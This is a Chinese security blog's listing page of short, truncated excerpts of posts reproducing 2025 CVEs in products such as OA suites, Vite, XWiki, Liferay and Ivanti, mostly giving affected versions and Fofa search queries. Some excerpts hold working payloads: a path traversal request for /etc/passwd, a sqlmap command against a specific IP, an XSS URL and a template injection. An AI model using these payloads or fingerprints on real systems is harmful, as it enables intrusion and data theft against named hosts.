- 博客(82)
- 收藏
- 关注
RSS订阅原创 致远OA-CVE-2025-34040-文件上传导致RCE
影响版本:致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1);致远OA G6、G6N (V8.1、V8.1SP1)想看其他内容访问https://pc.fenchuan8.com/#/index?Fofa:app=“致远互联-OA” && title=“V8.0SP2”
2025-09-20 22:05:14
131
原创 旭帆易云视信息科技有限公司_EasyCVR-CVE-2025-1595-信息泄露漏洞
想看其他内容访问https://pc.fenchuan8.com/#/index?
2025-09-20 22:00:54
41
原创 古拉普地震监控系统-CVE-2025-8286-telnet未授权访问
想看其他内容访问https://pc.fenchuan8.com/#/index?直接访问:Ip:4424;页面出现设备号基本都存在未授权访问。Telnet远程连接。
2025-09-20 21:58:57
91
原创 白星Protop-CVE-2025-44177-目录遍历
Fofa:body=“ProTop”<br/>影响版本:Protop v4.4.2-2024-11-27<br/><img src="https://i-blog.csdnimg.cn/direct/399a033fd8fb48d7978015ca1fa8a752.png" alt="在这里插入图片描述"/><br/>GET /pt3upd/…%2f…%2f…%2f…%2fetc%2fpasswd HTTP/1.1<br/>Host:<br/><img src="https://i-blog.cs
2025-09-20 21:55:55
86
原创 XWiki-CVE-2025-32430-反射xss
影响版本:4.2-milestone-3至16.4.7版本、16.5.0-rc-1至16.10.5版本和17.0.0-rc-1至17.2.2版本。
2025-09-20 21:41:56
160
原创 NestJSDevTools-CVE-2025-54782-远程命令执行
【代码】NestJSDevTools-CVE-2025-54782-远程命令执行。
2025-09-20 21:31:14
177
原创 AkamaiCloudTestSOAP-CVE-2025-49493-XML注入
影响版本:Akamai CloudTest < 60 2025.06.02 (12988)
2025-09-20 21:16:37
105
原创 灵当CRM yunzhijiaApi.php SQL注入漏洞(CVE-2025-8345)
sqlmap工具:sqlmap -u “http://139.186.219.52:85/crm/WeiXinApp/yunzhijia/yunzhijiaApi.php?FOFA:body=“crmcommon/js/jquery/jquery-1.10.1.min.js” || body=“http://localhost:8088/crm/index.php” && body=“ldcrm.base.js” || title=“灵当CRM”
2025-09-12 07:47:24
158
原创 金和C6 DelTemp.aspx XML实体注入致任意文件读取漏洞(CVE-2025-7523)
想看其他内容访问https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。FOFA:app=“金和网络-金和OA”python开启http服务,发送请求。
2025-09-12 07:42:00
149
原创 泛微E-cology9 SQL注入漏洞 (QVD-2025-23834)
想看其他内容访问https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。FOFA:app=“泛微-OA(e-cology)”
2025-09-12 07:38:12
221
原创 Lychee 照片管理工具 存在目录遍历漏洞(CVE-2025-50202)
想看其他内容访问https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-09-12 07:34:58
111
原创 Laravel LaRecipe renderBlade 未授权代码注入漏洞 (CVE-2025-53833)
想看其他内容访问https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。影响版本:LaRecipe < 2.8.1。
2025-09-12 07:33:03
203
原创 vBulletin replaceAdTemplate 存在远程代码执行漏洞(CVE-2025-48828)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。不同模板执行结果不同:<vb:if condition=‘phpinfo()’></vb:if>
2025-08-23 09:14:04
134
原创 ZZCMS index.php SQL注入漏洞(CVE-2025-0565)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。Fofa:“zzcms专业做招商网的程序源码”
2025-08-23 09:07:21
160
原创 LiferayPortal 反射xss漏洞复现(CVE-2025-4388)
payload:/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3Epayload:/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(xss)%3E漏洞验证完成;想看其他内容访问https
2025-08-23 08:54:09
242
原创 GeoServer-CVE-2025-27505-信息泄露
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。Poc1:有的虽然返回了路径 但是路径加了访问限制。
2025-08-23 08:50:00
145
原创 GeoServer-CVE-2025-30220-XXE
GeoTools 库使用 Eclipse XSD 库来处理 XML 数据,并且未正确配置 EntityResolver,这导致了 XML 外部实体 (XXE) 漏洞。当 GeoServer 或 GeoNetwork 调用 GeoTools 库处理 XML 数据时,攻击者可以注入恶意的 XML 实体,进而读取本地文件或发起其他攻击。想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?
2025-08-23 08:44:07
175
原创 Flowise AI 系统任意文件上传漏洞(CVE-2025-26319)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-23 08:33:28
207
原创 CrushFTP 存在身份验证绕过漏洞(CVE-2025-2825/CVE-2025-31161)
登录页面:https://15.160.65.226/WebInterface/login.html?
2025-08-23 08:08:22
86
原创 CentreStack 存在反序列化漏洞(CVE-2025-30406)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-23 07:39:07
137
原创 Elber 身份认证绕过漏洞(CVE-2025-0674)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。账户密码修改完成:admin/qazwsx@123。
2025-08-23 07:32:17
232
原创 Ivanti Connect Secure栈溢出漏洞(CVE-2025-0282)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-23 07:28:21
152
原创 Ivanti Endpoint Manager Mobile(EPMM)存在远程代码执行漏洞(CVE-2025-4427/CVE-2025-4428)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-22 13:35:57
173
原创 GLPI 未授权SQL注入漏洞复现(CVE-2025-24799)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-22 13:19:11
235
原创 DataEase(CVE-2025-49001-49002)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。铜锅默认账户账密登录:admin/DataEase@123456。
2025-08-22 11:59:52
219
原创 Cisco IOSXEWLC-任意文件上传(CVE-2025-20188)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-22 11:52:03
122
原创 Synway SMG网关管理软件 9-12ping.php 远程代码执行漏洞(CVE-2025-1448)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。body=“text ml10 mr20” && (title=“网关管理软件” || title=“Gateway Management”)
2025-08-22 09:46:04
163
原创 PaloAlto Networks PAN-OS GlobalProtect 反射型跨站脚本漏洞(CVE-2025-0133)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-22 09:40:46
211
原创 PaloAlto(CVE-2025-0108-0107)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。原理:通过Expedition 中的 www-data 用户身份运行任意作系统命令,从而导致运行 PAN-OS 软件的防火墙的用户名、明文密码、设备配置和设备 API 密钥泄露。影响版本:Palo Alto Networks Expedition< 1.2.101。
2025-08-22 09:40:05
111
原创 Vite-CVE-2025-31125-任意文件读取
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-22 09:26:46
202
原创 SysAid On-Prem-CVE-2025-2775-2776-2777
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。影响版本:SysAid On-Prem <= 23.3.40。影响版本:SysAid On-Prem <= 23.3.40。
2025-08-22 08:03:46
198
原创 XWiki SolrSearchMacros 远程代码执行漏洞(CVE-2025-24893)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-22 07:50:06
206
原创 Vite 任意文件读取漏洞(CVE-2025-31486)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-22 07:45:59
130
原创 Vite-CVE-2025-30208-任意文件读取
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-22 07:37:00
127
原创 百易云资产管理系统 SQL注入漏洞(CVE-2025-1535)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。Fofa:body=“不要着急,点此”
2025-08-22 07:29:05
211
原创 DocsGPT-CVE-2025-0868-RCE
FOFA:“Welcome to DocsGPT”原理:由于使用 eval() 对 JSON 数据进行解析不当,未经授权的攻击者可发送任意 Python 代码以通过 /api/remote 端点执行漏洞验证完成;想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
2025-08-21 08:23:08
148
原创 爱数智能内容管理平台-start_service-远程命令执行
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。通配符属性绕过,可利用/usr/bin/下可执行命令实现rce。
2025-08-21 08:16:24
153
原创 Pichome /index.php 文件读取漏洞(CVE-2025-1743)
想看其他内容访问https://www.wlaqsys.com与https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。Fofa:app=“用友-UFIDA-NC” || icon_hash=“1085941792” && icon_hash=“1085941792”影响版本:Yonyou erp V5.0。
2025-08-21 08:05:07
120
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人